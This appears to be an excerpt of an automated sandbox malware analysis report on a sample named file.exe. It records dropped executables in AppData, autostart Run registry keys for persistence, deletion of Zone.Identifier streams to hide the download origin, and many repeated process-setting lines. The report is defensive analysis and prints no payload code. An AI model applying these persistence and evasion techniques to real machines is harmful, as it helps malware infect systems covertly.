                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeJump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeJump to dropped file

                Boot Survival

                barindex
                Creates multiple autostart registry keys
                Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTmJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run QasvjoldkyhJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run QasvjoldkyhJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run QasvjoldkyhJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTmJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTmJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeFile opened: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
